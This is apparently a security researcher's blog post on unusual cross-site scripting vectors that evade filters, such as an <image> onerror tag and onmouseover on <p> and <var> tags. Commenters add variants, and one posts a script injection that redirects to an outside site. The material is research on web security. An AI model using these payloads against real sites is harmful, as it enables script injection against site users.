Unusual XSS vectors

I’ve been working on my Hackvertor script to include XSS fuzzing which isn’t ready yet but I thought you might be interested in a few interesting results I’ve found 🙂

First off I’m sure you know you can use XSS in a img object yeah? Well did you know there’s also a image object as well? It can be used like this:-

<image src="" onerror="alert(/XSS/)" />

Pretty neat eh? It may get round some XSS filters. It’s not in RSnake’s cheatsheet after a quick check.

Next up you can even inject Javascript into paragraph tags or obscure html tags like the following:-

<p onmouseover=alert(/XSS/)>Some very long paragraph goes here.</p>

Or what about this:-

<var onmouseover=alert(/XSS/)>Some very long paragraph goes here.</var>

Many other tags are supported using this method. That is all for now I hope you enjoyed this little post, I shall release my fuzzing research once the features have been completed in Hackvertor.

11 Responses to “Unusual XSS vectors”

  1. .mario writes:

    Wow – the <image> issue is new indeed. The rest is just plain browser madness – Firefox in particular.

    <image/src onerror=alert(1)>

    Incredible… Nice find 🙂 I await the day when Hackvertor hs an API with itching fingers 😉

  2. Gareth Heyes writes:

    Thanks Mario 🙂 I’ve registered a domain for Hackvertor and once I’ve finished the look behind matching and completed the fuzzing features I’ll start work on a API, which should be cool 😀

  3. Marcin writes:

    Cool! I wrote a http://www.tssci-security.com/archives/2007/11/15/blacklisting-xss-filter-evasion-and-other-resources/ a couple days ago about using <img src=”” onerror=alert(/xss/)> in a site review.. Didn’t even realize there was an <image> element that works the same.

    I’m going to have to try the onmouseover attribute next time around.

    Mario’s is a nice one too… I’m building up my own little cheat sheet as I go along. Perhaps XSS Cheat Sheet could use an update.


  4. .mario writes:

    onwhatever 🙂


    MSIE even features dozens of additional ones…

  5. Domber writes:

    > It’s not in RSnake’s cheatsheet after a quick check.

    But in his Book 😉
    “Cross Site Scripting Attacks: Xss Exploits and Defense”


  6. Gareth Heyes writes:


    He should update his cheatsheet then 🙂

  7. Reelix writes:

    An XSS attempt 🙂

    <script>window.location = ‘http://www.reelic.za.net/’></script>

  8. Reelix writes:


  9. Gareth Heyes writes:


    1. You’d be getting a XSS on wordpress and not me.
    2. You didn’t get XSS
    3. This is boring

  10. xss2root writes:

    some filter is based on the HTML syntax,it will remove all attributs like on*,remove some unsafe tags and so on.
    the filter just like a browser,and it’s safe much more.

  11. test writes:

    <image src=”” onerror=”alert(/XSS/)” />